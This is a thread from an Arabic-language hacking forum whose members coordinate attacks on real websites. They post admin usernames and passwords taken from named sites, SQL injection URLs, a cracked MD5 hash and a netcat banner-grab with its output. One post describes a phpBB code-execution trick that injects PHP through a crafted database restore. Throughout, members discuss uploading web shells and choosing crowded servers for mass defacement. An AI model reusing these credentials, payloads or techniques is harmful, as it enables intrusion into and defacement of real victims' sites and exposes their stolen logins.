|
يلا !! الموقع التاني فيه بنوته حلوه ههه |
يكفي ؟ |
بالنسبة للاب الثاني...... Target: http://policewala.in IP: 174.122.148.162 Control Panel: http://policewala.in/admin/ Admin ID: 1 Admin Username: admin Admin Password: shivani Admin Email: i n f o @ n o 1 j o u r n a l i s t . c o m كنت بشوف دروس الاخ Q2-FOX2R والحمدلله بتعلم شوي شو لول.. ماوصلت بعد لحد الشيل مع إنها باينة سهلة, بس ماأتجرأ بعد. فا يحيا العمل الجماعي :yipi: |
اقتباس:
|
اقتباس:
:party: |
|
اقتباس:
|
هههههه رااااائع دعس :rofl: :whip: |
لوول مو انا :) الكل دعسوا ان شاء الله في المره القادمة نضع آندكس جماعي :) يعني بيكون فيه فقط اسم العناكب |
السيرفر الاول: بكره الMD5.............. :grrrrrr: 96372edd7141813a887a699c28c00796 جاري البحث عن طرق بديلة........ |
هههههههههههه وجدتو.. جاري الإستغلال. |
هل يوجد هدف اخوي نور الله يحفظك اعملو قسم استهداف مواقع اقولها مند الدورة الاولى من الدراسة الصيف نريد نستهدف مملنا عشوائي :) |
اقتباس:
يلا جهزلي نفسك لرفع ال شل هههههه 90% رح تظبط انشالله :glasses: هل سيرفر جنني والله :surprised: |
جميــــــــــــــــــــع مواقع السيرفر مستهدفه :) تم اسقاط واحد والباقي نشوفوا :) ههه |
اضافة :lol: http://www.cheela.org/rav.php?id=-1%...0limit%201,1-- login = shimon68 pass = apte ----------------------------------- http://www.cheela.org/rav.php?id=-1%...0limit%200,1-- |
اقتباس:
|
|
هل الأعضاء هنا من أجل المشاركة في كيفية رفع الشال ؟ هذا الموقع http://rhythmsystem.2pointproject.com تجريب الانجكشن http://rhythmsystem.2pointproject.co...ages.php?id=20' و هذا الحقن http://rhythmsystem.2pointproject.co...FROM%20admin-- اليوزر rhythm#2p@user الباس c33dmmrrpm أرجو الرد و شكرااااااااااااااا |
انا برفع شل اووك ؟ |
أكييييييييييي ;) لم أفهم كيفية رفع الشال اذا كنت تعرف أبعتلي كيف عندي مواقع أخرى :angel: |
أكيي أعني بها أرفع الشال |
اقتباس:
|
أكي في الانتظار :D |
هل عملت بنظام اللينوكس ؟ أفضل الأدوات لحقن قاعدة البيانات هي sqlninja لكن تأخذ وقت طويل حسب سرعة النات ;) |
اقتباس:
|
الباس غلط :( http://rhythmsystem.2pointproject.com/admin/ |
للأسف أنا أستعمل اللينوكس باك تراك 5 كل أدوات الهاكر موجودة ^^ أنصحك به .......... رأيت تعليقك حول معرفة السرفر في أحد المواضيع سهلة جدا باستعمال netcat netcat -v rhythmsystem.2pointproject.com 80 ثم HEAD / HTTP/1.0 ثم ENTER مرتين المثال root@bt:~# netcat -v rhythmsystem.2pointproject.com 80 DNS fwd/rev mismatch: rhythmsystem.2pointproject.com != 2pointsource.com rhythmsystem.2pointproject.com [216.227.208.44] 80 (www) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Content-Length: 5558 Content-Type: text/html Content-Location: http://216.227.208.44/Index.html Last-Modified: Thu, 29 Apr 2010 18:35:38 GMT Accept-Ranges: bytes ETag: "a88daac3cae7ca1:14855" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sun, 03 Jul 2011 23:21:31 GMT Connection: close |
|
اقتباس:
ذي معلومات للسيرفر فقط :) ؟ |
نعم للسرفر من أين حصلت على الباس المشفرة ؟ هل فكيت التشفير |
الباس المشفة ليست صالحة هذا الفك c3d3rrun |
|
السيرفر راح يسببلي الجنوووووون :mad: وسيلة لحد هنا: http://www.cheela.org/cheelfor http://www.cheela.org/cheelfor/admin phpBB forum username: vbondoux he's admin... pass: sZCnYyk8 جربت كتير, ماقدرت الاقي وسيلة لرفع الشيل. بس في طريقة غير... تخلق فيل تسميه "Shell.sql" أو آية شي تاني... بس يكون sql.وتحت داخيلو UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo());' WHERE user_id=2; وبعدها تعمل restore database من لوحة التحكم الادمن.وفي تعديل ال profile نرى أن معلومات ال php ظهرت. يعني بالكود نبدل phpinfo() بـأي كود php تاني ويمشي. بس أنا مااعرف اش......... وللصراحة يئست منيل phpBB ورايح الدور على ثغرة تانية بـنفس الموقع. |
الحمد لله أنك استفدت من فك التشفير مشكلتي أني لا أعرف رفع الشال اذا لم أجد الأبلود أو تحديد مكانه في url |
اقتباس:
كنت بصمم آندكس هه |
مين رفع شل ؟ |
اقتباس:
تم الاسقاط |
|
الله عليك يا غالي م في سرفر اخر هدف ندعس ابوه ولكن يكون مملوء مواقع 1000 او اكتر لكي يتوفر المجال لكل الهاكرز مبتدئ متوسط .. |
اعطونا السيرفر يلي بدكم |
| الساعة الآن 08:48 AM |
[ vBspiders.Com Network ]